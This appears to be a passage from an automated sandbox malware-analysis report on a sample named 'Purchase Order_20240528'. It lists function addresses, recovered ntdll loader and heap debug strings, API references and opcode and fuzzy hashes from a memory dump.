                                  • Instruction Fuzzy Hash: 8571D031A01286DFDB26EF6CD8406ADFBF2FF8A714F088199E5459B752CB319940CB94
                                  Function 015D65B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01639AC5, 01639B06
                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 01639AF6
                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 01639AB4
                                  • LdrpLoadShimEngine, xrefs: 01639ABB, 01639AFC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimuser$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-3589223738
                                  • Opcode ID: 30438efc9d4246ed39a4e3fdd0cda0dc519e9cf1f0fb4cd9dc516539ee6baab8
                                  • Instruction ID: 44de2c9e1289b4016867d91f9069609f2cdfc0d559439a7c2350d17fb51f7ba7
                                  • Opcode Fuzzy Hash: 30438efc9d4246ed39a4e3fdd0cda0dc519e9cf1f0fb4cd9dc516539ee6baab8
                                  • Instruction Fuzzy Hash: C6513532B013599FDB28EBACCC54AED7BB2BB80304F050119E501AF289DBB0AC51CB94
                                  Function 0160D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 0160D959
                                    • Part of subcall function 015E4859: RtlDebugPrintTimes.NTDLL ref: 015E48F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-1975516107
                                  • Opcode ID: c4a0d6e7b0f1bdcea902e3f032b66100b3c4ffc37a9f6af8f172f5cdc737df23
                                  • Instruction ID: aa04a36ccd5bf7777a14bebe83e05db94fd30421ddcfbbc8007b93dd8035133d
                                  • Opcode Fuzzy Hash: c4a0d6e7b0f1bdcea902e3f032b66100b3c4ffc37a9f6af8f172f5cdc737df23
                                  • Instruction Fuzzy Hash: 9F51DE72E002469FDB2ADFE8CC847AEBBB2BF44314F15525DC9056B2C1D770AA52CB90
                                  Function 0160DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                  • API String ID: 3446177414-3224558752
                                  • Opcode ID: fa26bb56f94c7fefd64805a0a63c4bbd8a8841a5894a444d2155424e16d7ef66
                                  • Instruction ID: 35c15febab323fb3368af070afdf80630a7596b44ffd478444f332017b2af844
                                  • Opcode Fuzzy Hash: fa26bb56f94c7fefd64805a0a63c4bbd8a8841a5894a444d2155424e16d7ef66
                                  • Instruction Fuzzy Hash: 56415770600A46DFD72ADFACCC85BAAB7A5FF45324F0041ACD5018B3D1CB749880C790
                                  Function 0168F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • HEAP: , xrefs: 0168F15D
                                  • ---------------------------------------, xrefs: 0168F279
                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 0168F263
                                  • Entry Heap Size , xrefs: 0168F26D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                  • API String ID: 3446177414-1102453626
                                  • Opcode ID: 77fdef30ecc1e9b8c34721b4928c82c41c0723b954b517919502198c268063d1
                                  • Instruction ID: a83b41a25f83c46881bc94c303fef89ac3e6e5d1ca81501939f0ff281bdcb98f
                                  • Opcode Fuzzy Hash: 77fdef30ecc1e9b8c34721b4928c82c41c0723b954b517919502198c268063d1
                                  • Instruction Fuzzy Hash: 3441D039A01216DFCB25EF58DC90966BBF2FF4A34471682A9D448DB715CB31EC42CB80
                                  Function 0160DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                  • API String ID: 3446177414-1222099010
                                  • Opcode ID: 6b20fde34a784c2e0f64f7b62989bfe57c576ff5183d8f3780c0f41a4a4322af
                                  • Instruction ID: e56be691ff18dd2f2fe3f2dc2a50b3fcda3972b6b69bfdea16258af67c725390
                                  • Opcode Fuzzy Hash: 6b20fde34a784c2e0f64f7b62989bfe57c576ff5183d8f3780c0f41a4a4322af
                                  • Instruction Fuzzy Hash: AB31E030105784DFE73BDBACCC49BA67BE9FF41B50F054189E4468BB92CBA8A881C751
                                  Function 016B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction ID: 53d8b8ea8d2954b18b677427825aa517fad5de898047d0d60e1ccfa8029c4fb0
                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction Fuzzy Hash: 64020671508342AFD705DF18C890AAFBBE6EFC8704F04892DF9895B264DB31E985CB56
                                  Function 0162B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 6aec899807205976fea51f60ccfedd1828bd37497e27a9210f0ec36173eabcd9
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 3981BD30E05A7A8EEF258E6CCC917FEBBA2EF45320F1C421AD861A7391C77488418F55
                                  Function 015E9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$@
                                  • API String ID: 3446177414-1194432280
                                  • Opcode ID: b68695d2d2c952e58588007038f2b527bd2d9e660bf6e32d8701ee909610707c
                                  • Instruction ID: bd021465cd7f573d9d5995b0b9acdb933ad9e14a4d88cb204c6f846ce5c35c79
                                  • Opcode Fuzzy Hash: b68695d2d2c952e58588007038f2b527bd2d9e660bf6e32d8701ee909610707c
                                  • Instruction Fuzzy Hash: C0811BB1D002699BDB35CB54CC54BEEBBB4BB48754F1041DAEA19B7280D7309E84CFA4
                                  Function 01614D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • LdrpFindDllActivationContext, xrefs: 01653636, 01653662
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 0165365C
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0165362F
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01653640, 0165366C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-3779518884
                                  • Opcode ID: 1be7c69a078dd366a2265292996d9217d9dcd756844201244d2e2547aa4882bf
                                  • Instruction ID: f6e98eee9ff021f29872a2e94574d1f1690fc4d9455c9d57757404260c2d3a2b
                                  • Opcode Fuzzy Hash: 1be7c69a078dd366a2265292996d9217d9dcd756844201244d2e2547aa4882bf
                                  • Instruction Fuzzy Hash: 2B31F633D00612AADF36AB5CDC49A6566B4BB01B54F8E406AE9085B359EFA09C808795
                                  Function 016920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: 4bc739cc3d428715c6fe8ff09f3c18b15637877a0a3fb72cbec2dee29b44a243
                                  • Instruction ID: 850ce548ab0379ae3486a62ae79bae9996006ada4e481c24a08448b7e6fb431b
                                  • Opcode Fuzzy Hash: 4bc739cc3d428715c6fe8ff09f3c18b15637877a0a3fb72cbec2dee29b44a243
                                  • Instruction Fuzzy Hash: FE2153BAE00119ABDB10DE69DC50AEEBBEDAF54651F05011EEA05D3200E730DA158BA1
                                  Function 01624960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0I8w$0I8w$0I8w$X
                                  • API String ID: 3446177414-113150377
                                  • Opcode ID: 14e97215f0421b1cf23ab5cb8db38e3a05624cb36109073ca91af8ecf8b17e8a
                                  • Instruction ID: 6a187c24c8547fc18f30edb3722bea538ca75866fd7dcd4782381d20cc3bb765
                                  • Opcode Fuzzy Hash: 14e97215f0421b1cf23ab5cb8db38e3a05624cb36109073ca91af8ecf8b17e8a
                                  • Instruction Fuzzy Hash: E9317A31E0161AEBCF228EADDC40B8D3BA1AB88759F05501DFD0496249DB708A60CF96
                                  Function 0160F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 0165031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016502BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016502E7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 4f7d969d0c684a93579e0b324b25c41bc6085806b15bc8bf45adaa494937605c
                                  • Instruction ID: 4650b342b90fc9f3aacd1e0c130ed75f4cc4985fb85caed5c1b9ccc36abb426b
                                  • Opcode Fuzzy Hash: 4f7d969d0c684a93579e0b324b25c41bc6085806b15bc8bf45adaa494937605c
                                  • Instruction Fuzzy Hash: 08E19C306047429FD76ACF28CC84B2ABBE1BB88314F144A9DF9A58B3E1D775D945CB42
                                  Function 015DF910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 3446177414-3610490719
                                  • Opcode ID: 6ead60cdd310658f73405543456576bf087653a45ad06fde3236f54443816e0c
                                  • Instruction ID: 8bab7f970b6faaf9e8bd9fa1e05dfeea96835b76884e1f621326ab47d80d70b5
                                  • Opcode Fuzzy Hash: 6ead60cdd310658f73405543456576bf087653a45ad06fde3236f54443816e0c
                                  • Instruction Fuzzy Hash: 3291E271A05642DBD736EB2CCC84B7AB7E5BF94700F05045AE9429F381DB74E842CBA2
                                  Function 016B8927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 016B8B03
                                  • RtlDebugPrintTimes.NTDLL ref: 016B8B5B
                                    • Part of subcall function 01622B60: LdrInitializeThunk.NTDLL ref: 01622B6A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes$InitializeThunk
                                  • String ID: $File
                                  • API String ID: 1259822791-2412145507
                                  • Opcode ID: 41be3d0c700e83ca0c6a2f02b8c9c2335fc928e828f6bc4686b86f8f60134afc
                                  • Instruction ID: 506ecf48b7229a17b80171f893b3c4a7b5ebb7449dec601a397fd9da637c955d
                                  • Opcode Fuzzy Hash: 41be3d0c700e83ca0c6a2f02b8c9c2335fc928e828f6bc4686b86f8f60134afc
                                  • Instruction Fuzzy Hash: 64618071A1022D9BDB268F28DC95BE97BBDAB48710F0441EDE909E7181DB709F84CF54
                                  Function 01609803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-2283098728
                                  • Opcode ID: edb612fd0d1a160432759e968f5a8d47ef7ab2de6bd8e20b1b5dc54ca99ac281
                                  • Instruction ID: 6c49f74b13cf1559959780ab635ce3710f1ec94ba55ce21b64a2d06974ad8e11
                                  • Opcode Fuzzy Hash: edb612fd0d1a160432759e968f5a8d47ef7ab2de6bd8e20b1b5dc54ca99ac281
                                  • Instruction Fuzzy Hash: 1451F771B043039BD72AEF78CC85B2B77A2BB94718F050A2DE55A9B3D2D7709905C781
                                  Function 0161BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 01657BAC
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01657B7F
                                  • RTL: Resource at %p, xrefs: 01657B8E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: dc92c29f63dac70e376734747ee895246a67abc4500725fc45336a4375fc577b
                                  • Instruction ID: 7d6c840e51d8b1b6926f98332e70207985f275ec8f1220a79196ef67a02a4425
                                  • Opcode Fuzzy Hash: dc92c29f63dac70e376734747ee895246a67abc4500725fc45336a4375fc577b
                                  • Instruction Fuzzy Hash: 1841CF317007029FD720DE2ADC40B6AB7E6EF98720F140A1DF95ADB780DB31E8058B95
                                  Function 0161B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0165728C
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 016572C1
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01657294
                                  • RTL: Resource at %p, xrefs: 016572A3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 990045e8fc2007858826369c62c9d40e5ceda772591cec9477eb3b3b68051e0d
                                  • Instruction ID: 1a21b25a07baa3c6cb606bfd1d2d8652103922e8079f50893788b179201aa69e
                                  • Opcode Fuzzy Hash: 990045e8fc2007858826369c62c9d40e5ceda772591cec9477eb3b3b68051e0d
                                  • Instruction Fuzzy Hash: C341F031640206ABC720CE6ACC41B6AB7B6FB94750F14861DFD55EB340DB21E8028BD5
                                  Function 01692300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: ee4fca0b81512d4d02413cdf4fe5582beca3678331662c8bcf650be6c95bc07e
                                  • Instruction ID: 8c20d781298a55702d6189d7e6398e8628a9ea8c5d713b480d964306167c17a9
                                  • Opcode Fuzzy Hash: ee4fca0b81512d4d02413cdf4fe5582beca3678331662c8bcf650be6c95bc07e
                                  • Instruction Fuzzy Hash: 82317172A00619AFDF20DE2DDC50BEEB7BCAB54610F44055EE949E3240EB30AA548BA0
                                  Function 01665F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Wow64 Emulation Layer
                                  • API String ID: 3446177414-921169906
                                  • Opcode ID: 4026d93c67e7213c782249f412077cfae6fb1f5de968acaf3fde6547b504c3d4
                                  • Instruction ID: 83ade11b84ab1809969999221ec96f5ad357d83935186ff9974f6f61b1ad5494
                                  • Opcode Fuzzy Hash: 4026d93c67e7213c782249f412077cfae6fb1f5de968acaf3fde6547b504c3d4
                                  • Instruction Fuzzy Hash: DE212C75A0021EBFAF019AA58C85CFFBB7DFF856D9B040068FB11A6140D730AE119B60
                                  Function 016B7CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 90bbbb7de2311a09704e816c7331a9c63e93419ed1733c429d70564173a3fc4b
                                  • Instruction ID: 3abc82968ca167c6b535cae17b2e3be4da90b4272a76de47ac7bddc1e19e7839
